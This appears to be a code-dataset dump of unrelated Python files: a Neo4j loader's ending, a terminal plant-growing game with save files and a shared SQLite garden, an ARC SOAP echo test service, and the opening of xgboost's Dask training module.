neo_transactor.start_threads(data_manager.get_neo_transactor_thread_settings())
self.logger.debug("finished starting neo threads ")
if not self.context_info.env["USING_PICKLE"]:
self.logger.info("Creating indices.")
Neo4jHelper.create_indices()
etl_time_tracker_list = self.run_etl_groups(self.logger, data_manager, neo_transactor)
neo_transactor.shutdown()
elapsed_time = time.time() - self.start_time
for time_item in etl_time_tracker_list:
self.logger.info(time_item)
self.logger.info('Loader finished. Elapsed time: %s' % time.strftime("%H:%M:%S", time.gmtime(elapsed_time)))
if __name__ == '__main__':
main()
|
botany.py | #!/usr/bin/env python2
from __future__ import division
import time
import pickle
import json
import os
import random
import getpass
import threading
import errno
import uuid
import sqlite3
from menu_screen import *
# TODO:
# - Switch from personal data file to table in DB
class Plant(object):
# This is your plant!
stage_list = [
'seed',
'seedling',
'young',
'mature',
'flowering',
'seed-bearing',
]
color_list = [
'red',
'orange',
'yellow',
'green',
'blue',
'indigo',
'violet',
'white',
'black',
'gold',
'rainbow',
]
rarity_list = [
'common',
'uncommon',
'rare',
'legendary',
'godly',
]
species_list = [
'poppy',
'cactus',
'aloe',
'venus flytrap',
'jade plant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
mutation_list = [
'',
'humming',
'noxious',
'vorpal',
'glowing',
'electric',
'icy',
'flaming',
'psychic',
'screaming',
'chaotic',
'hissing',
'gelatinous',
'deformed',
'shaggy',
'scaly',
'depressed',
'anxious',
'metallic',
'glossy',
'psychedelic',
'bonsai',
'foamy',
'singing',
'fractal',
'crunchy',
'goth',
'oozing',
'stinky',
'aromatic',
'juicy',
'smug',
'vibrating',
'lithe',
'chalky',
'naive',
'ersatz',
'disco',
'levitating',
'colossal',
'luminous',
'cosmic',
'ethereal',
'cursed',
'buff',
'narcotic',
'gnu/linux',
'abraxan', # rip dear friend
]
def __init__(self, this_filename, generation=1):
# Constructor
self.plant_id = str(uuid.uuid4())
self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30)
# self.life_stages = (2, 4, 6, 8, 10) # debug mode
self.stage = 0
self.mutation = 0
self.species = random.randint(0,len(self.species_list)-1)
self.color = random.randint(0,len(self.color_list)-1)
self.rarity = self.rarity_check()
self.ticks = 0
self.age_formatted = "0"
self.generation = generation
self.dead = False
self.write_lock = False
self.owner = getpass.getuser()
self.file_name = this_filename
self.start_time = int(time.time())
self.last_time = int(time.time())
# must water plant first day
self.watered_timestamp = int(time.time())-(24*3600)-1
self.watered_24h = False
self.visitors = []
def migrate_properties(self):
# Migrates old data files to new
if not hasattr(self, 'generation'):
self.generation = 1
if not hasattr(self, 'visitors'):
self.visitors = []
def parse_plant(self):
# Converts plant data to human-readable format
output = ""
if self.stage >= 3:
output += self.rarity_list[self.rarity] + " "
if self.mutation != 0:
output += self.mutation_list[self.mutation] + " "
if self.stage >= 4:
output += self.color_list[self.color] + " "
output += self.stage_list[self.stage] + " "
if self.stage >= 2:
output += self.species_list[self.species] + " "
return output.strip()
def rarity_check(self):
# Generate plant rarity
CONST_RARITY_MAX = 256.0
rare_seed = random.randint(1,CONST_RARITY_MAX)
common_range = round((2/3)*CONST_RARITY_MAX)
uncommon_range = round((2/3)*(CONST_RARITY_MAX-common_range))
rare_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range))
legendary_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range))
common_max = common_range
uncommon_max = common_max + uncommon_range
rare_max = uncommon_max + rare_range
legendary_max = rare_max + legendary_range
godly_max = CONST_RARITY_MAX
if 0 <= rare_seed <= common_max:
rarity = 0
elif common_max < rare_seed <= uncommon_max:
rarity = 1
elif uncommon_max < rare_seed <= rare_max:
rarity = 2
elif rare_max < rare_seed <= legendary_max:
rarity = 3
elif legendary_max < rare_seed <= godly_max:
rarity = 4
return rarity
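# Worked example with CONST_RARITY_MAX = 256: common covers seeds 1-171,
# uncommon 172-228, rare 229-247, legendary 248-253 and godly 254-256.
# Each tier keeps ~2/3 of the range the previous tiers left over, so a
# godly plant rolls with probability 3/256 (about 1.2%).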
def dead_check(self):
# if it has been >5 days since watering, sorry plant is dead :(
time_delta_watered = int(time.time()) - self.watered_timestamp
if time_delta_watered > (5 * (24 * 3600)):
self.dead = True
return self.dead
def update_visitor_db(self, visitor_names):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
for name in visitor_names:
c = conn.cursor()
# parameterized queries keep quotes in names from breaking (or injecting into) the SQL
c.execute("SELECT * FROM visitors WHERE garden_name = ? AND visitor_name = ?", (self.owner, name))
data = c.fetchone()
if data is None:
c.execute("INSERT INTO visitors (garden_name, visitor_name, weekly_visits) VALUES (?, ?, 1)", (self.owner, name))
else:
c.execute("UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = ? AND visitor_name = ?", (self.owner, name))
conn.commit()
conn.close()
def guest_check(self):
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
visitor_filepath = os.path.join(botany_dir,'visitors.json')
guest_timestamps = []
visitors_this_check = []
if os.path.isfile(visitor_filepath):
with open(visitor_filepath, 'r') as visitor_file:
data = json.load(visitor_file)
if data:
for element in data:
if element['user'] not in self.visitors:
self.visitors.append(element['user'])
if element['user'] not in visitors_this_check:
visitors_this_check.append(element['user'])
# prevent users from manually setting watered_time in the future
if element['timestamp'] <= int(time.time()):
guest_timestamps.append(element['timestamp'])
try:
self.update_visitor_db(visitors_this_check)
except Exception:
# best effort: a locked or missing garden db shouldn't crash the game
pass
with open(visitor_filepath, 'w') as visitor_file:
visitor_file.write('[]')
else:
with open(visitor_filepath, mode='w') as f:
json.dump([], f)
os.chmod(visitor_filepath, 0666)
if not guest_timestamps:
return self.watered_timestamp
all_timestamps = [self.watered_timestamp] + guest_timestamps
all_timestamps.sort()
# calculate # of days between each guest watering
timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])]
# plant's latest timestamp should be set to last timestamp before a
# gap of 5 days
last_valid_element = next((x for x in timestamp_diffs if x > 5), None)
if not last_valid_element:
# all timestamps are within a 5 day range, can just use latest one
return all_timestamps[-1]
last_valid_index = timestamp_diffs.index(last_valid_element)
# slice list to only include up until a >5 day gap
valid_timestamps = all_timestamps[:last_valid_index + 1]
return valid_timestamps[-1]
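# Worked example: watered on day 0, guests water on days 1 and 8. Then
# timestamp_diffs is [1.0, 7.0]; the first gap > 5 days sits at index 1,
# so valid_timestamps is [day 0, day 1] and day 1 is returned -- the day-8
# watering came after the plant had already gone more than 5 days dry.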
def water_check(self):
self.watered_timestamp = self.guest_check()
self.time_delta_watered = int(time.time()) - self.watered_timestamp
if self.time_delta_watered <= (24 * 3600):
if not self.watered_24h:
self.watered_24h = True
return True
else:
self.watered_24h = False
return False
def mutate_check(self):
# Create plant mutation
# Increase this # to make mutation rarer (chance 1 out of x each second)
CONST_MUTATION_RARITY = 20000
mutation_seed = random.randint(1,CONST_MUTATION_RARITY)
if mutation_seed == CONST_MUTATION_RARITY:
# mutation gained!
mutation = random.randint(0,len(self.mutation_list)-1)
if self.mutation == 0:
self.mutation = mutation
return True
else:
return False
def growth(self):
# Increase plant growth stage
if self.stage < (len(self.stage_list)-1):
self.stage += 1
def water(self):
# Water the plant and mark it watered for the day
if not self.dead:
self.watered_timestamp = int(time.time())
self.watered_24h = True
def start_over(self):
# After plant reaches final stage, given option to restart
# increment generation only if previous stage is final stage and plant
# is alive
if not self.dead:
next_generation = self.generation + 1
else:
# Should this reset to 1? Seems unfair.. for now generations will
# persist through death.
next_generation = self.generation
self.write_lock = True
self.kill_plant()
while self.write_lock:
# Wait for garden writer to unlock
# garden db needs to update before allowing the user to reset
pass
if not self.write_lock:
self.__init__(self.file_name, next_generation)
def kill_plant(self):
self.dead = True
def unlock_new_creation(self):
self.write_lock = False
def start_life(self):
# runs life on a thread
thread = threading.Thread(target=self.life, args=())
thread.daemon = True
thread.start()
def life(self):
# I've created life :)
while True:
if not self.dead:
if self.watered_24h:
self.ticks += 1
if self.stage < len(self.stage_list)-1:
if self.ticks >= self.life_stages[self.stage]:
self.growth()
if self.mutate_check():
pass
if self.water_check():
# Do something
pass
if self.dead_check():
# Do something else
pass
# TODO: event check
generation_bonus = 0.2 * (self.generation - 1)
adjusted_sleep_time = 1 / (1 + generation_bonus)
time.sleep(adjusted_sleep_time)
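# Example pacing from the generation bonus above: generation 1 sleeps 1.0s
# per tick, generation 2 sleeps 1/1.2 ~= 0.83s, and generation 6 sleeps
# 0.5s, so plants from later generations accumulate ticks faster.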
class DataManager(object):
# handles user data, puts a .botany dir in user's home dir (OSX/Linux)
# handles shared data with sqlite db
# TODO: the .dat save should only happen on mutation, water, death, exit, or
# harvest; otherwise the data hasn't changed. The json can be written at any
# time since it is never read back for data within botany.
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
game_dir = os.path.dirname(os.path.realpath(__file__))
this_user = getpass.getuser()
savefile_name = this_user + '_plant.dat'
savefile_path = os.path.join(botany_dir, savefile_name)
# set self.savefile_path to the guest garden path
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
garden_json_path = os.path.join(game_dir, 'garden_file.json')
harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat')
harvest_json_path = os.path.join(botany_dir, 'harvest_file.json')
def __init__(self):
self.this_user = getpass.getuser()
# check if instance is already running
# check for .botany dir in home
try:
os.makedirs(self.botany_dir)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.savefile_name = self.this_user + '_plant.dat'
def check_plant(self):
# check for existing save file
if os.path.isfile(self.savefile_path):
return True
else:
return False
def start_threads(self,this_plant):
# creates daemon threads: death checks every .1s, autosave every 5s (garden json every 60s)
death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,))
death_check_thread.daemon = True
death_check_thread.start()
autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,))
autosave_thread.daemon = True
autosave_thread.start()
def death_check_update(self,this_plant):
# .1 second updates and lock to minimize race condition
while True:
is_dead = this_plant.dead_check()
if is_dead:
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
self.harvest_plant(this_plant)
this_plant.unlock_new_creation()
time.sleep(.1)
def autosave(self, this_plant):
# running on thread, saves plant every 5s TODO: this is unnecessary
# and breaks shit probably
file_update_count = 0
while True:
file_update_count += 1
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
if file_update_count == 12:
# only update garden json every 60s
self.update_garden_json()
time.sleep(5)
file_update_count %= 12
def load_plant(self):
# load savefile
with open(self.savefile_path, 'rb') as f:
this_plant = pickle.load(f)
# migrate data structure to create data for empty/nonexistent plant
# properties
this_plant.migrate_properties()
# get status since last login
is_watered = this_plant.water_check()
is_dead = this_plant.dead_check()
if not is_dead:
if is_watered:
time_delta_last = int(time.time()) - this_plant.last_time
ticks_to_add = min(time_delta_last, 24*3600)
this_plant.time_delta_watered = 0
self.last_water_gain = time.time()
else:
ticks_to_add = 0
this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1)
return this_plant
def plant_age_convert(self,this_plant):
# human-readable plant age
age_seconds = int(time.time()) - this_plant.start_time
days, age_seconds = divmod(age_seconds, 24 * 60 * 60)
hours, age_seconds = divmod(age_seconds, 60 * 60)
minutes, age_seconds = divmod(age_seconds, 60)
age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds))
return age_formatted
def init_database(self):
# check if dir exists, create sqlite directory and set OS permissions to 777
sqlite_dir_path = os.path.join(self.game_dir,'sqlite')
if not os.path.exists(sqlite_dir_path):
os.makedirs(sqlite_dir_path)
os.chmod(sqlite_dir_path, 0777)
conn = sqlite3.connect(self.garden_db_path)
init_table_string = """CREATE TABLE IF NOT EXISTS garden (
plant_id tinytext PRIMARY KEY,
owner text,
description text,
age text,
score integer,
is_dead numeric
)"""
c = conn.cursor()
c.execute(init_table_string)
conn.close()
# init only, creates and sets permissions for garden db and json
if os.stat(self.garden_db_path).st_uid == os.getuid():
os.chmod(self.garden_db_path, 0666)
open(self.garden_json_path, 'a').close()
os.chmod(self.garden_json_path, 0666)
def migrate_database(self):
conn = sqlite3.connect(self.garden_db_path)
migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors (
id integer PRIMARY KEY,
garden_name text,
visitor_name text,
weekly_visits integer
)"""
c = conn.cursor()
c.execute(migrate_table_string)
conn.close()
return True
def update_garden_db(self, this_plant):
# insert or update this plant id's entry in DB
# TODO: make sure other instances of user are deleted
# Could create a clean db function
self.init_database()
self.migrate_database()
age_formatted = self.plant_age_convert(this_plant)
conn = sqlite3.connect(self.garden_db_path)
c = conn.cursor()
# insert or replace via parameterized query (owner/description may contain quotes)
update_query = """INSERT OR REPLACE INTO garden (
plant_id, owner, description, age, score, is_dead
) VALUES (?, ?, ?, ?, ?, ?)"""
c.execute(update_query, (this_plant.plant_id,
this_plant.owner,
this_plant.parse_plant(),
age_formatted,
this_plant.ticks,
int(this_plant.dead)))
conn.commit()
conn.close()
def retrieve_garden_from_db(self):
# Builds a dict of dicts from garden sqlite db
garden_dict = {}
conn = sqlite3.connect(self.garden_db_path)
# Need to allow write permissions by others
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('SELECT * FROM garden ORDER BY owner')
tuple_list = c.fetchall()
conn.close()
# Building dict from table rows
for item in tuple_list:
garden_dict[item[0]] = {
"owner":item[1],
"description":item[2],
"age":item[3],
"score":item[4],
"dead":item[5],
}
return garden_dict
def update_garden_json(self):
this_garden = self.retrieve_garden_from_db()
with open(self.garden_json_path, 'w') as outfile:
json.dump(this_garden, outfile)
def save_plant(self, this_plant):
# create savefile
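# write-to-temp-then-rename keeps the save atomic: if the process dies
# mid-write the old savefile is untouched (rename replaces it in one step
# on POSIX)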
this_plant.last_time = int(time.time())
temp_path = self.savefile_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_plant, f, protocol=2)
os.rename(temp_path, self.savefile_path)
def data_write_json(self, this_plant):
# create personal json file for user to use outside of the game (website?)
json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json')
# also updates age
age_formatted = self.plant_age_convert(this_plant)
plant_info = {
"owner":this_plant.owner,
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
"is_dead":this_plant.dead,
"last_watered":this_plant.watered_timestamp,
"file_name":this_plant.file_name,
"stage": this_plant.stage_list[this_plant.stage],
"generation": this_plant.generation,
}
if this_plant.stage >= 3:
plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity]
if this_plant.mutation != 0:
plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation]
if this_plant.stage >= 4:
plant_info["color"] = this_plant.color_list[this_plant.color]
if this_plant.stage >= 2:
plant_info["species"] = this_plant.species_list[this_plant.species]
with open(json_file, 'w') as outfile:
json.dump(plant_info, outfile)
def harvest_plant(self, this_plant):
# TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants
# harvest is a dict of dicts
# harvest contains one entry for each plant id
age_formatted = self.plant_age_convert(this_plant)
this_plant_id = this_plant.plant_id
plant_info = {
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
}
if os.path.isfile(self.harvest_file_path):
# harvest file exists: load data
with open(self.harvest_file_path, 'rb') as f:
this_harvest = pickle.load(f)
new_file_check = False
else:
this_harvest = {}
new_file_check = True
this_harvest[this_plant_id] = plant_info
# dump harvest file
temp_path = self.harvest_file_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_harvest, f, protocol=2)
os.rename(temp_path, self.harvest_file_path)
# dump json file
with open(self.harvest_json_path, 'w') as outfile:
json.dump(this_harvest, outfile)
return new_file_check
if __name__ == '__main__':
my_data = DataManager()
# if plant save file exists
if my_data.check_plant():
my_plant = my_data.load_plant()
# otherwise create new plant
else:
my_plant = Plant(my_data.savefile_path)
my_data.data_write_json(my_plant)
# my_plant is either a fresh plant or an existing plant at this point
my_plant.start_life()
my_data.start_threads(my_plant)
try:
botany_menu = CursedMenu(my_plant,my_data)
my_data.save_plant(my_plant)
my_data.data_write_json(my_plant)
my_data.update_garden_db(my_plant)
finally:
cleanup()
|
EchoService.py | import arc
import time
logger = arc.Logger(arc.Logger_getRootLogger(), 'EchoService.py')
wsrf_rp_ns = "http://docs.oasis-open.org/wsrf/rp-2"
echo_ns = "http://www.nordugrid.org/schemas/echo"
import threading
class EchoService(object):
def __init__(self, cfg):
logger.msg(arc.INFO, "EchoService (python) constructor called")
# get the response-prefix from the config XML
self.prefix = str(cfg.Get('prefix'))
# get the response-suffix from the config XML
self.suffix = str(cfg.Get('suffix'))
logger.msg(arc.DEBUG, "EchoService (python) has prefix %(prefix)s and suffix %(suffix)s" % {'prefix': self.prefix, 'suffix': self.suffix})
self.ssl_config = self.parse_ssl_config(cfg)
thread_test = str(cfg.Get('ThreadTest'))
if thread_test:
threading.Thread(target = self.infinite, args=[thread_test]).start()
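# Sketch of the service config shape this constructor reads (element names
# inferred from the cfg.Get() calls above; the outer element and attribute
# values are examples only):
# <Service name="pythonservice" id="echo">
# <prefix>[ </prefix>
# <suffix> ]</suffix>
# <ClientSSLConfig FromFile="client_ssl.xml"/>
# <ThreadTest>http://localhost:60000/Echo</ThreadTest>
# </Service>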
def __del__(self):
logger.msg(arc.INFO, "EchoService (python) destructor called")
def parse_ssl_config(self, cfg):
try:
client_ssl_node = cfg.Get('ClientSSLConfig')
fromFile = str(client_ssl_node.Attribute('FromFile'))
if fromFile:
try:
xml_string = open(fromFile).read()
client_ssl_node = arc.XMLNode(xml_string)
except:
# reading the external SSL config is optional: log and fall through
logger.msg(arc.WARNING, 'Failed to read client SSL config from %s' % fromFile)
if client_ssl_node.Size() == 0:
return {}
ssl_config = {}
ssl_config['key_file'] = str(client_ssl_node.Get('KeyPath'))
ssl_config['cert_file'] = str(client_ssl_node.Get('CertificatePath'))
ca_file = str(client_ssl_node.Get('CACertificatePath'))
if ca_file:
ssl_config['ca_file'] = ca_file
else:
ssl_config['ca_dir'] = str(client_ssl_node.Get('CACertificatesDir'))
return ssl_config
except:
import traceback
logger.msg(arc.ERROR, traceback.format_exc())
return {}
def infinite(self, url):
logger.msg(arc.INFO, "EchoService (python) thread test starting")
i = 0
while True:
try:
i += 1
cfg = arc.MCCConfig()
s = arc.ClientSOAP(cfg, arc.URL(url))
ns = arc.NS('echo', echo_ns)
outpayload = arc.PayloadSOAP(ns)
outpayload.NewChild('echo:echo').NewChild('echo:say').Set('hi!')
resp, status = s.process(outpayload)
logger.msg(arc.INFO, "EchoService (python) thread test, iteration %(iteration)s %(status)s" % {'iteration': i, 'status': status})
time.sleep(3)
except Exception as e:
import traceback
logger.msg(arc.DEBUG, traceback.format_exc())
def GetLocalInformation(self):
ns = arc.NS({'':'http://schemas.ogf.org/glue/2008/05/spec_2.0_d41_r01'})
info = arc.XMLNode(ns,'Domains')
service_node = info.NewChild('AdminDomain').NewChild('Services').NewChild('Service')
service_node.NewChild('Type').Set('org.nordugrid.tests.echo_python')
endpoint_node = service_node.NewChild('Endpoint')
endpoint_node.NewChild('HealthState').Set('ok')
endpoint_node.NewChild('ServingState').Set('production')
return info
def process(self, inmsg, outmsg):
logger.msg(arc.DEBUG, "EchoService (python) 'Process' called")
# time.sleep(10)
# get the payload from the message
inpayload = inmsg.Payload()
logger.msg(arc.VERBOSE, 'inmsg.Auth().Export(arc.SecAttr.ARCAuth) = %s' % inmsg.Auth().Export(arc.SecAttr.ARCAuth).GetXML())
logger.msg(arc.VERBOSE, 'inmsg.Attributes().getAll() = %s ' % inmsg.Attributes().getAll())
logger.msg(arc.INFO, "EchoService (python) got: %s " % inpayload.GetXML())
# the first child of the payload should be the name of the request
request_node = inpayload.Child()
# get the namespace
request_namespace = request_node.Namespace()
logger.msg(arc.DEBUG, "EchoService (python) request_namespace: %s" % request_namespace)
if request_namespace != echo_ns:
if request_namespace == wsrf_rp_ns:
outpayload = arc.PayloadSOAP(arc.NS({'wsrf-rp':wsrf_rp_ns}))
outpayload.NewChild('wsrf-rp:GetResourcePropertyDocumentResponse').NewChild(self.GetLocalInformation())
outmsg.Payload(outpayload)
logger.msg(arc.DEBUG, "outpayload %s" % outpayload.GetXML())
return arc.MCC_Status(arc.STATUS_OK)
raise Exception('wrong namespace. expected: %s' % echo_ns)
# get the name of the request without the namespace prefix
# this is the name of the Body node's first child
request_name = request_node.Name()
# create an answer payload
ns = arc.NS({'echo': echo_ns})
outpayload = arc.PayloadSOAP(ns)
# here we defined that 'echo' prefix will be the namespace prefix of 'http://www.nordugrid.org/schemas/echo'
# get the message
say = str(request_node.Get('say'))
# put it between the response-prefix and the response-suffix
hear = self.prefix + say + self.suffix
if request_name == 'double':
# if the name of the request is 'double'
# we create a new echo message which we send to http://localhost:60000/Echo using the ClientSOAP object
cfg = arc.MCCConfig()
ssl = False
if self.ssl_config:
cfg.AddCertificate(self.ssl_config.get('cert_file', None))
cfg.AddPrivateKey(self.ssl_config.get('key_file', None))
if 'ca_file' in self.ssl_config:
cfg.AddCAFile(self.ssl_config.get('ca_file', None))
else:
cfg.AddCADir(self.ssl_config.get('ca_dir', None))
ssl = True
if ssl:
url = arc.URL('https://localhost:60000/Echo')
logger.msg(arc.DEBUG, 'Calling https://localhost:60000/Echo using ClientSOAP')
else:
url = arc.URL('http://localhost:60000/Echo')
logger.msg(arc.DEBUG, 'Calling http://localhost:60000/Echo using ClientSOAP')
# creating the ClientSOAP object
s = arc.ClientSOAP(cfg, url)
new_payload = arc.PayloadSOAP(ns)
# creating the message
new_payload.NewChild('echo:echo').NewChild('echo:say').Set(hear)
logger.msg(arc.DEBUG, 'new_payload %s' % new_payload.GetXML())
# sending the message
resp, status = s.process(new_payload)
# get the response
hear = str(resp.Get('echoResponse').Get('hear'))
elif request_name == 'httplib':
# if the name of the request is 'httplib'
# we create a new echo message which we send to http://localhost:60000/echo using python's built-in http client
try:
import http.client as httplib
except ImportError:
import httplib
logger.msg(arc.DEBUG, 'Calling http://localhost:60000/Echo using httplib')
# create the connection
h = httplib.HTTPConnection('localhost', 60000)
new_payload = arc.PayloadSOAP(ns)
# create the message
new_payload.NewChild('echo:echo').NewChild('echo:say').Set(hear)
logger.msg(arc.DEBUG, 'new_payload %s' % new_payload.GetXML())
# send the message
h.request('POST', '/Echo', new_payload.GetXML())
r = h.getresponse()
response = r.read()
logger.msg(arc.DEBUG, response)
resp = arc.XMLNode(response)
# get the response
hear = str(resp.Child().Get('echoResponse').Get('hear'))
elif request_name == 'wait':
logger.msg(arc.DEBUG, 'Start waiting 10 sec...')
time.sleep(10)
logger.msg(arc.DEBUG, 'Waiting ends.')
# we create a node at '/echo:echoResponse/echo:hear' and put the string in it
outpayload.NewChild('echo:echoResponse').NewChild('echo:hear').Set(hear)
outmsg.Payload(outpayload)
logger.msg(arc.DEBUG, "outpayload %s" % outpayload.GetXML())
# return with STATUS_OK
return arc.MCC_Status(arc.STATUS_OK)
# you can easily test this with this shellscript:
"""
MESSAGE='<?xml version="1.0"?><soap-env:Envelope xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:soap-env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:star="http://www.nordugrid.org/schemas/echo"><soap-env:Body><star:echo><star:say>HELLO</star:say></star:echo></soap-env:Body></soap-env:Envelope>'
echo Request:
echo $MESSAGE
echo
echo Response:
curl -d "$MESSAGE" http://localhost:60000/Echo
echo
"""
#
|
dask.py | # pylint: disable=too-many-arguments, too-many-locals, no-name-in-module
# pylint: disable=missing-class-docstring, invalid-name
# pylint: disable=too-many-lines, fixme
# pylint: disable=too-few-public-methods
# pylint: disable=import-error
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for a simple
tutorial. Also see xgboost/demo/dask for some examples.
There are two sets of APIs in this module: one is the functional API, including
the ``train`` and ``predict`` methods; the other is the stateful Scikit-Learn
wrapper inherited from the single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from collections.abc import Sequence
from threading import Thread
from typing import TYPE_CHECKING, List, Tuple, Callable, Optional, Any, Union, Dict, Set
from typing import Awaitable, Generator, TypeVar
import numpy
from . import rabit, config
from .callback import TrainingCallback
from .compat import LazyLoader
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import lazy_isinstance
from .core import DMatrix, DeviceQuantileDMatrix, Booster, _expect, DataIter
from .core import Objective, Metric
from .core import _deprecate_positional_args
from .training import train as worker_train
from .tracker import RabitTracker, get_host_ip
from .sklearn import XGBModel, XGBClassifier, XGBRegressorBase, XGBClassifierBase
from .sklearn import _wrap_evaluation_matrices, _objective_decorator
from .sklearn import XGBRankerMixIn
from .sklearn import xgboost_model_doc
from .sklearn import _cls_predict_proba
from .sklearn import XGBRanker
if TYPE_CHECKING:
from dask import dataframe as dd
from dask import array as da
import dask
import distributed
else:
dd = LazyLoader('dd', globals(), 'dask.dataframe')
da = LazyLoader('da', globals(), 'dask.array')
dask = LazyLoader('dask', globals(), 'dask')
distributed = LazyLoader('distributed', globals(), 'dask.distributed')
_DaskCollection = Union["da.Array", "dd.DataFrame", "dd.Series"]
try:
from mypy_extensions import TypedDict
TrainReturnT = TypedDict('TrainReturnT', {
'booster': Booster,
'history': Dict,
})
except ImportError:
TrainReturnT = Dict[str, Any] # type:ignore
# TODOs:
# - CV
#
# Note for developers:
#
# As of writing asyncio is still a new feature of Python and in depth documentation is
# rare. Best examples of various asyncio tricks are in dask (luckily). Classes like
# Client, Worker are awaitable. Some general rules for the implementation here:
#
# - Synchronous world is different from asynchronous one, and they don't mix well.
# - Write everything with async, then use distributed Client sync function to do the
# switch.
# - Use Any for type hint when the return value can be union of Awaitable and plain
# value. This is caused by Client.sync can return both types depending on context.
# Right now there's no good way to silence:
#
# await train(...)
#
# if train returns an Union type.
LOGGER = logging.getLogger('[xgboost.dask]')
def _start_tracker(n_workers: int) -> Dict[str, Any]:
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
host = get_host_ip('auto')
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
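# The returned env is what every worker needs to reach the tracker; with the
# dmlc tracker convention it looks roughly like (values are examples):
# {'DMLC_NUM_WORKER': 2, 'DMLC_TRACKER_URI': '10.0.0.1', 'DMLC_TRACKER_PORT': 9091}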
def _assert_dask_support() -> None:
try:
import dask # pylint: disable=W0621,W0611
except ImportError as e:
raise ImportError(
"Dask needs to be installed in order to use this module"
) from e
if platform.system() == "Windows":
msg = "Windows is not officially supported for dask/xgboost,"
msg += " contribution are welcomed."
LOGGER.warning(msg)
class RabitContext:
'''A context controlling rabit initialization and finalization.'''
def __init__(self, args: List[bytes]) -> None:
self.args = args
worker = distributed.get_worker()
self.args.append(
('DMLC_TASK_ID=[xgboost.dask]:' + str(worker.address)).encode())
def __enter__(self) -> None:
rabit.init(self.args)
LOGGER.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args: List) -> None:
rabit.finalize()
LOGGER.debug('--------------- rabit say bye ------------------')
def concat(value: Any) -> Any: # pylint: disable=too-many-return-statements
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if lazy_isinstance(value[0], 'cudf.core.dataframe', 'DataFrame') or \
lazy_isinstance(value[0], 'cudf.core.series', 'Series'):
from cudf import concat as CUDF_concat # pylint: disable=import-error
return CUDF_concat(value, axis=0)
if lazy_isinstance(value[0], 'cupy.core.core', 'ndarray'):
import cupy
# pylint: disable=c-extension-no-member,no-member
d = cupy.cuda.runtime.getDevice()
for v in value:
d_v = v.device.id
assert d_v == d, 'Concatenating arrays on different devices.'
return cupy.concatenate(value, axis=0)
return dd.multi.concat(list(value), axis=0)
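# e.g. concat([numpy.ones((2, 2)), numpy.zeros((1, 2))]) returns a (3, 2)
# array; every branch above performs the same row-wise stacking for its
# respective backend (scipy, pandas, cudf, cupy, dask).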
def _xgb_get_client(client: Optional["distributed.Client"]) -> "distributed.Client":
'''Simple wrapper around testing None.'''
if not isinstance(client, (type(distributed.get_client()), type(None))):
raise TypeError(
_expect([type(distributed.get_client()), type(None)], type(client)))
ret = distributed.get_client() if client is None else client
return ret
# From the implementation point of view, DaskDMatrix complicates a lot of
# things. A large portion of the code base is about syncing and extracting
# stuff from DaskDMatrix. But having an independent data structure gives us a
# chance to perform some specialized optimizations, like building histogram
# index directly.
class DaskDMatrix:
# pylint: disable=missing-docstring, too-many-instance-attributes
'''DMatrix holding on references to Dask DataFrame or Dask Array. Constructing a
`DaskDMatrix` forces all lazy computation to be carried out. Wait for the input data
explicitly if you want to see actual computation of constructing `DaskDMatrix`.
See doc for :py:obj:`xgboost.DMatrix` constructor for other parameters. DaskDMatrix
accepts only dask collection.
.. note::
DaskDMatrix does not repartition or move data between workers. It's
